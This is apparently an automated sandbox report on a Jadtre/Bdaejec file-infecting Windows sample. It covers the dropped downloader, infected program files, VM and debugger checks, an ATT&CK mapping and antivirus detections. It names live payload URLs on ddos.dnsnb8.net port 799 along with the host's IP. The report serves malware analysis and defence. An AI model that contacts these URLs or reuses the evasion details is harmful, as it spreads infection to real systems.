Code function: 0_2_005E397D LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_005E397D

Source: initial sample

Static PE information: section where entry point is pointing to: uY

Source: BXOZIGZEUa.exe	Static PE information: section name: uY
Source: JdEV.exe.0.dr	Static PE information: section name: .aspack
Source: JdEV.exe.0.dr	Static PE information: section name: .adata
Source: SciTE.exe.2.dr	Static PE information: section name: u
Source: Uninstall.exe.2.dr	Static PE information: section name: EpNuZ
Source: MyProg.exe.2.dr	Static PE information: section name: PELIB
Source: MyProg.exe.2.dr	Static PE information: section name: Y\|uR

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_005CEB2E push ecx; ret	0_2_005CEB41
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_005CF1C5 push ecx; ret	0_2_005CF1D8
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Code function: 2_2_00D16076 push 00D114E1h; ret	2_2_00D16425
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Code function: 2_2_00D11638 push dword ptr [00D13084h]; ret	2_2_00D1170E
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Code function: 2_2_00D12D9B push ecx; ret	2_2_00D12DAB
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Code function: 2_2_00D1600A push ebp; ret	2_2_00D1600D

Source: BXOZIGZEUa.exe	Static PE information: section name: uY entropy: 6.933836062310107
Source: JdEV.exe.0.dr	Static PE information: section name: .text entropy: 7.81169422100848
Source: SciTE.exe.2.dr	Static PE information: section name: u entropy: 6.934632238899902
Source: Uninstall.exe.2.dr	Static PE information: section name: EpNuZ entropy: 6.933745853880427
Source: MyProg.exe.2.dr	Static PE information: section name: Y\|uR entropy: 6.935226585670217

Persistence and Installation Behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	File created: C:\Users\user\AppData\Local\Temp\JdEV.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe

File created: C:\Users\user\Desktop\uninstall.log

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 799

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_0051814E IsWindowVisible,IsIconic,	0_2_0051814E
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_0052A4EB GetParent,GetParent,IsIconic,GetParent,	0_2_0052A4EB
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_00524603 IsIconic,PostMessageW,	0_2_00524603
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_004F0624 SetForegroundWindow,IsIconic,	0_2_004F0624
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_004F06C8 IsIconic,	0_2_004F06C8
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_00522724 IsWindow,GetFocus,IsChild,SendMessageW,IsChild,SendMessageW,IsIconic,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,IsWindowVisible,	0_2_00522724
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_005109D9 GetClientRect,IsRectEmpty,IsIconic,BeginDeferWindowPos,GetClientRect,IsRectEmpty,IsRectEmpty,EqualRect,GetWindowRect,GetParent,EndDeferWindowPos,	0_2_005109D9
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_005231B3 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,	0_2_005231B3
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_005231B3 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,	0_2_005231B3
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_005231B3 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,	0_2_005231B3
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_005234B3 IsWindowVisible,ScreenToClient,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetSystemMetrics,PtInRect,GetSystemMetrics,PtInRect,GetSystemMetrics,PtInRect,	0_2_005234B3
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_004FB730 SetRectEmpty,RedrawWindow,ReleaseCapture,SetCapture,ReleaseCapture,SetCapture,SendMessageW,UpdateWindow,SendMessageW,IsWindow,IsIconic,IsZoomed,IsWindow,UpdateWindow,	0_2_004FB730
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_00523A3E IsWindow,IsWindowVisible,GetWindowRect,PtInRect,GetAsyncKeyState,ScreenToClient,IsWindow,IsWindow,IsWindow,GetWindowRect,PtInRect,SendMessageW,PtInRect,SendMessageW,ScreenToClient,PtInRect,GetParent,SendMessageW,GetFocus,WindowFromPoint,SendMessageW,GetSystemMenu,IsMenu,EnableMenuItem,EnableMenuItem,EnableMenuItem,IsZoomed,IsIconic,EnableMenuItem,TrackPopupMenu,SendMessageW,	0_2_00523A3E

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe

Code function: 0_2_004DE757 __EH_prolog3_GS,GetDeviceCaps,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,_memset,GetTextCharsetInfo,lstrcpyW,lstrcpyW,EnumFontFamiliesW,EnumFontFamiliesW,lstrcpyW,EnumFontFamiliesW,lstrcpyW,CreateFontIndirectW,CreateFontIndirectW,CreateFontIndirectW,CreateFontIndirectW,CreateFontIndirectW,CreateFontIndirectW,GetSystemMetrics,lstrcpyW,CreateFontIndirectW,GetStockObject,GetStockObject,GetObjectW,GetObjectW,lstrcpyW,CreateFontIndirectW,CreateFontIndirectW,GetStockObject,GetObjectW,CreateFontIndirectW,CreateFontIndirectW,__EH_prolog3_GS,GetVersionExW,KiUserCallbackDispatcher,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_004DE757

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe

Code function: 0_2_004D2540 SetupDiGetClassDevsW,SetupDiEnumDeviceInfo,GetLastError,GetLastError,GetLastError,GetLastError,SetupDiGetDeviceRegistryPropertyW,SetupDiGetDeviceRegistryPropertyW,GetLastError,GetLastError,GetLastError,LocalFree,LocalAlloc,SetupDiGetDeviceRegistryPropertyW,GetLastError,GetLastError,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,SetupDiCallClassInstaller,SetupDiEnumDeviceInfo,SetupDiDestroyDeviceInfoList,

0_2_004D2540

Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\JdEV.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_0-62961

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe

API coverage: 4.2 %

Source: C:\Users\user\AppData\Local\Temp\JdEV.exe

Code function: 2_2_00D11718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00D11754h

2_2_00D11718

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_004DB7F2 lstrlenW,SetLastError,FindFirstFileW,GetLastError,__wfullpath,__wsplitpath_s,__wmakepath_s,	0_2_004DB7F2
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_004DB3FE GetModuleHandleW,GetProcAddress,FindFirstFileW,	0_2_004DB3FE
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_004ED5ED __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	0_2_004ED5ED
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	Code function: 2_2_00D129E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,	2_2_00D129E2

Source: C:\Users\user\AppData\Local\Temp\JdEV.exe

Code function: 2_2_00D12B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

2_2_00D12B8C

Source: Amcache.hve.2.dr	Binary or memory string: VMware
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.2.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.2.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.2.dr	Binary or memory string: VMware20,1hbin@
Source: BXOZIGZEUa.exe, 00000000.00000002.2078356609.0000000000B78000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware.NTamd64.6.2
Source: Amcache.hve.2.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: BXOZIGZEUa.exe, 00000000.00000002.2078356609.0000000000B78000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware.
Source: Amcache.hve.2.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: JdEV.exe, 00000002.00000003.2080979564.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp, JdEV.exe, 00000002.00000002.2597372810.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp, JdEV.exe, 00000002.00000002.2597372810.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.2.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.2.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.2.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.2.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.2.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.2.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.2.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.2.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.2.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.2.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.2.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.2.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.2.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.2.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual RAM
Source: JdEV.exe, 00000002.00000002.2597372810.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWL
Source: Amcache.hve.2.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.2.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	API call chain: ExitProcess graph end node			graph_0-62962
Source: C:\Users\user\AppData\Local\Temp\JdEV.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe

Code function: 0_2_005CC787 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_005CC787

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe

0_2_005E397D

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe

Code function: 0_2_00676044 mov eax, dword ptr fs:[00000030h]

0_2_00676044

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe

Code function: 0_2_005E9DE5 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

0_2_005E9DE5

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_005CC787 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_005CC787
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: 0_2_005D3EF0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_005D3EF0

Source: SciTE.exe.2.dr

Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_005E22DF
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_005E2767
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_005E27CE
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	0_2_005E280A
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: GetLocaleInfoW,__snwprintf_s,LoadLibraryExW,	0_2_004D8F07
Source: C:\Users\user\Desktop\BXOZIGZEUa.exe	Code function: GetLocaleInfoA,	0_2_005E5C9F

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe

0_2_004D2540

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe

Code function: 0_2_005D20CC GetSystemTimeAsFileTime,__aulldiv,

0_2_005D20CC

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe

0_2_004DE757

Source: Amcache.hve.2.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Bdaejec

Source: Yara match

File source: Process Memory Space: JdEV.exe PID: 3524, type: MEMORYSTR

Remote Access Functionality

Yara detected Bdaejec

Source: Yara match

File source: Process Memory Space: JdEV.exe PID: 3524, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	3 Native API	1 DLL Side-Loading	1 Access Token Manipulation	11 Masquerading	31 Input Capture	11 System Time Discovery	1 Taint Shared Content	31 Input Capture	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	2 Process Injection	1 Access Token Manipulation	LSASS Memory	1 Query Registry	Remote Desktop Protocol	1 Archive Collected Data	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	2 Process Injection	Security Account Manager	131 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	12 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	23 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
BXOZIGZEUa.exe	88%	Virustotal		Browse
BXOZIGZEUa.exe	95%	ReversingLabs	Win32.Virus.Jadtre
BXOZIGZEUa.exe	100%	Avira	W32/Jadtre.B
BXOZIGZEUa.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files\7-Zip\Uninstall.exe	100%	Avira	W32/Jadtre.B
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Avira	W32/Jadtre.B
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Avira	W32/Jadtre.B
C:\Users\user\AppData\Local\Temp\JdEV.exe	100%	Avira	TR/Dldr.Small.Z.haljq
C:\Program Files\7-Zip\Uninstall.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\JdEV.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\JdEV.exe	97%	ReversingLabs	Win32.Trojan.Skeeyah

Source	Detection	Scanner	Label
http://ddos.dnsnb8.net:799/cj//k1.raru	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k2.rarS	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k2.rarGp	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k2.rar	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ddos.dnsnb8.net	44.221.84.105	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ddos.dnsnb8.net:799/cj//k1.rar	false		high
http://ddos.dnsnb8.net:799/cj//k2.rar	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.smartsharesystems.com/Morten	SciTE.exe.2.dr	false		high
http://ddos.dnsnb8.net:799/cj//k2.rarS	JdEV.exe, 00000002.00000002.2597372810.0000000000D9E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.scintilla.org/scite.rng	SciTE.exe.2.dr	false		high
http://www.develop.com	SciTE.exe.2.dr	false		high
http://www.lua.org	SciTE.exe.2.dr	false		high
http://www.rftp.comJosiah	SciTE.exe.2.dr	false		high
